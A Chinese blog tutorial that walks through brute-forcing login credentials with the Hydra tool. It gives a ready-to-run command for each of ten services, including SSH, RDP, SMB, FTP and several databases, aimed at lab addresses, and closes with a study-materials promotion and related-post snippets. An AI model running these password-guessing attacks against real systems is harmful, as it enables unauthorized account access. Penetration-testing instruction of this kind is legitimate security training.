应用协议安全:Hydra 端口爆破工具.(九头蛇)

于 2024-05-17 11:30:00 发布
阅读量883 收藏 8
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59598029/article/details/138845456
版权

应用协议安全:Hydra 端口爆破工具.(九头蛇)

Hydra 也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号和密码进行爆破,包括 Web

登录、数据库、SSH、FTP 等服务.

目录:

应用协议安全:Hydra 端口爆破工具.(九头蛇)

Hydra(九头蛇)使用:

使用方法:直接打开 kali 终端,输入.

(1)实战:爆破 SSH 协议.( 22 端口 )

(2)实战:爆破 远程桌面 RDP.( 3389 端口 )

(3)实战:爆破 共享文件 SMB ( 445 端口 )

(4)实战:爆破 邮箱协议 POP3( 110 端口 )

(5)实战:爆破 文件传输 FTP ( 21 端口 )

(6)实战:爆破 MSSQL数据库( 1433 端口 )

(7)实战:爆破 MySQL数据库( 3306 端口 )

(8)实战:爆破 Oracle数据库( 1521 端口 )

(9)实战:爆破 Redis数据库( 6379 端口 )

(10)实战:爆破 PgSQL数据库( 5432 端口 )

免责声明:

严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。
Hydra(九头蛇)使用的参数:

-s 指定端口

-l 指定用户名

-L 指定用户名字典(文件)

-p 指定密码破解

-P 指定密码字典(文件)

-o 保存执行结果

-e 空密码探测和指定用户密码探测(ns)

-C 用户名可以用:分割(username:password)

-vV 显示详细过程

Hydra(九头蛇)使用:

使用方法:直接打开 kali 终端,输入.
hydra

(1)实战:爆破 SSH 协议.( 22 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ssh

-L 指定用户名字典(文件)

-P 指定密码字典(文件)


ssh iwebsec@192.168.0.105            //登录 ssh (22端口)

ssh 账号@地址

(2)实战:爆破 远程桌面 RDP.( 3389 端口 )
hydra -l administrator -P /root/root.txt 192.168.0.106 rdp -vV

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程


rdesktop 192.168.0.106:3389        //登录远程桌面3389

rdesktop 地址:3389

(3)实战:爆破 共享文件 SMB ( 445 端口 )
hydra -l administrator -P /root/root.txt 192.168.0.106 smb

-l 指定用户名

-P 指定密码字典(文件)

(4)实战:爆破 邮箱协议 POP3( 110 端口 )
hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 pop3 -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(5)实战:爆破 文件传输 FTP ( 21 端口 )
hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 ftp -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(6)实战:爆破 MSSQL数据库( 1433 端口 )
hydra -l sa -P /root/root.txt 192.168.0.106 mssql -vV 

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程
(7)实战:爆破 MySQL数据库( 3306 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 mysql -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(8)实战:爆破 Oracle数据库( 1521 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 oracle -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(9)实战:爆破 Redis数据库( 6379 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 redis -vV 
 
-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程
(10)实战:爆破 PgSQL数据库( 5432 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 postgresql -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

教IT的小强
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Razer Hydra 九头体感游戏控制器驱动 v1.01 官方版
07-03
RazerHydra九头体感控制器驱动程序是由官方推出的一款手柄驱动程序,该驱动全面支持Windows的各个系统,安装驱动后用户可以进行各种设置,欢迎下载!RazerHydra九头体感控制器手感扳机键和摇杆的手感不错,可控制器正面的几个按键手感一般,感,欢迎下载体验
hydra-synth:九头的合成引擎
04-30
Hydra-Synth 视频合成引擎。 目前处于实验/正在进行中。 这是hydra打包为javascript模块的主要逻辑,旨在在javascript项目中使用。 如果您希望快速开始使用hydra,请访问或。 要在atom内使用hydra,请按照的说明进行操作。 包含在网页中(捆绑版): 在您的html文件中包含该库的捆绑版本: < script src =" https://unpkg.com/hydra-synth " > </ script > < script > // create a new hydra-synth instance var hydra = new Hydra ( { detectAudio : false } ) osc ( 4 , 0.1 , 1.2 ) . out ( ) </ script > 您可以在此处
记录一次 hydra爆破虚拟机win10 3389端口_hydra 3389 端口修改(2)
最新发布
m0_60144796的博客
04-12 247
1.首先打开win10关闭防火墙和杀毒软件。因为杀毒软件和防火墙会拦截恶意的爆破手段2.打开kali系统然后打开xhydra图形化 hydra。这里设置目标的IP地址,爆破端口,还有协议并设置输出显示。3.然后设置你需要爆破的用户名和需要爆破的密码或者字典。4.然后启动爆破
hydra-antlia:九头的功能集合
05-22
安特里亚 的功能集合。 Antlia使在Hydra内部更容易使用几何图形,着色和交互性。 它还增加了易于使用的图像使用和额外的“数学”功能。 如果您只是在这里查看文档,请单击。 如何使用 到目前为止,使用Antlia的唯一方法是在或上打开Hydra并运行。 经过评估后,您可以自由删除代码并开始编码。 请记住,您可以按Ctrl + A + Supr! 为什么选择安特里亚(Antlia)? 如果您想知道这个名字, Antlia是Hydra的南部边界建筑。 如果您想知道为什么我要制作Antlia,请按以下步骤进行: 用纯净的九头做几何图形的工作可能真的很乏味。 毕竟,Hydra的灵感来自于模拟模块化合成器。 在尝试在Hydra内绘制一些标记并意识到模拟信号的思维方式对于特定目标如此直观时,我开始了Antlia的工作。 我想多编码,少思考。 当您无法获得预期的结果时,必须对数学函数进行
hydra-toolbox:九头盒子的工具
02-12
hydra-toolbox:九头盒子的工具
matlab代码sqrt-hydra_behavior:九头行为的机器学习分析
05-23
Matlab代码sqrt hydra_behavior 该项目提供了一种使用计算机视觉方法对Hydra行为进行分类的工具。 有关该方法的详细信息,请参见Han等。 [1]。 概述 这是针对Hydra寻常型开发的一种自动行为分析方法,使用的是自适应词袋(BoW)框架。 简要地说,此方法包括以下步骤: 视频预处理-从背景中分割九头,将九头适合椭圆,将九头分为三个身体部位(触角,上半身,下半身),将九头区域旋转到垂直位置,将其缩放到标准化长度,并生成用户指定长度的短视频剪辑(默认为5秒)。 特征提取-使用密集轨迹工具提取视频特征,包括光流直方图(HOF),定向梯度直方图(HOG)和运动边界直方图(MBH)。 代码簿生成-使用高斯混合模型(GMM)生成具有用户指定编号的高斯混合物的代码簿。 特征编码-使用Fisher矢量将GMM码本中提取的特征编码。 分类-使用手动标签训练SVM分类器以对预定义的行为类型进行分类。 t-SNE嵌入-将高维Fisher向量嵌入到2D空间中,并以无人监督的方式发现行为类型。 汇编 密集轨迹 首先需要编译的是密集的轨迹包。 请按照此页面上的说明进行操作:。
hydra九头详细教程(5分钟内快速学会)
热门推荐
csdnrrxka的博客
11-11 1万+
hydra详细教程(本文的目的是使小白能一眼看懂,能够直接使用hydra进行破解,而不是一大堆hydra的命令) hydra工具介绍 hydra又名九头,是一款爆破神器。 支持linux,windows,mac等多平台,推荐使用kali自带的。 ...
Hydra(九头)密码破解工具的详细使用教程
黄乔国PHP
07-16 4264
Hydra是⼀款开源的暴⼒密码pojie⼯具,⽀持多种协议密码的破译。可以对多种服务的账号和密码进行爆破,包括 数据库、SSH、FTP 等服务,在 Kali Linux 中自带 Hydra。有了这个工具就可以很方便的对密码进行破解。其简单的使用参数如下:完整参数可以使用-h来查看:支持爆破的服务也很多:如http,ftp,redis, mysql,mssql, mongod等等。
hydra九头爆破常见端口
guanjian_ci的博客
05-11 5529
整理一下 hydra 端口爆破命令语法 目录: 简介 1. 21端口爆破命令 2. 22端口爆破命令 3. 1433端口爆破命令 4. 3306端口爆破命令 5. 3389端口爆破命令 6. smb服务爆破命令 7. imap服务爆破命令 总结 简介 hydra 也称九头, 是著名黑客组织thc的一款开源的暴力密码破解工具,可以破解多种密码。 1. 21端口爆破命令 21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务, FTP服务主要是为
Hydra(九头)工具使用
剁椒鱼头没剁椒的博客
01-03 1万+
hydra九头)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
ssh爆破工具hydra.zip
04-27
ssh爆破工具hydra.zip
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议爆破
hydra-link-checker::snake:九头
05-07
Hydra:Python中的多线程站点爬网链接检查器 一个Python程序爬行滑行者 :snake: 用于链接的网站,并打印YAML损坏链接的报告。 需要 Python 3.6或更高版本。 Neo没有外部依赖性。 用法 在终端中运行: python hydra.py [URL] 确保URL是包含架构的绝对URL,即https://example.com 。 该报告将采用格式。 要将输出保存到文件,请运行: python hydra.py [URL] > [PATH/TO/FILE.yaml] 您可以使用命令替换将当前日期添加到文件名,例如: python hydra.py [URL] > /path/to/ $( date ' +%Y_%m_%d ' ) _report.yaml 要了解Hydra检查您的网站需要多长时间,请添加time : time python hydra.py
九头安全测试工具Hydra v9.1)
08-10
一款功能强大,目的合法,易于操作的安全测试工具 此Windows适用版本为Thomas D.提供的脚本,供大家研究学习之用 下载后直接解压至D盘即可(任意)
Hydra密码爆破工具使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
qq_53058639的博客
09-04 362
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Hydra九头工具使用(非常详细)从零基础入门到精通,看完这一篇就够了。
qq_44005305的博客
07-25 1313
hydra九头)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
【网安神器篇】——hydra爆破工具
Demo不是emo的博客
11-22 1万+
今天给大家分享的神兵利器是一款爆破工具——hydra
hydra爆破工具的缺点
04-22
Hydra爆破工具的缺点可能包括以下几点: 1. 并发请求限制:由于Hydra工具默认使用多线程发起请求,这就有可能导致在一些情况下,服务器会拒绝服务或者被防火墙屏蔽。 2. 特定协议支持不完善:虽然Hydra支持多种协议(如FTP,SSH,Telnet等),但它的支持在某些情况下可能并不完善,导致无法进行爆破或者出现其他问题。 3. 较为依赖字典:Hydra爆破成功率较大程度上取决于字典的质量和字典中包含的密码种类和数量,因此在字典的选择和使用上需要慎重。 4. 可能存在误报和漏报:在进行爆破过程中,由于网络传输、响应等环节存在不确定性,因此可能会存在一定概率的误报或漏报。 需要注意的是,Hydra作为一个开源的工具爆破行为可能违反法律法规,请合法使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值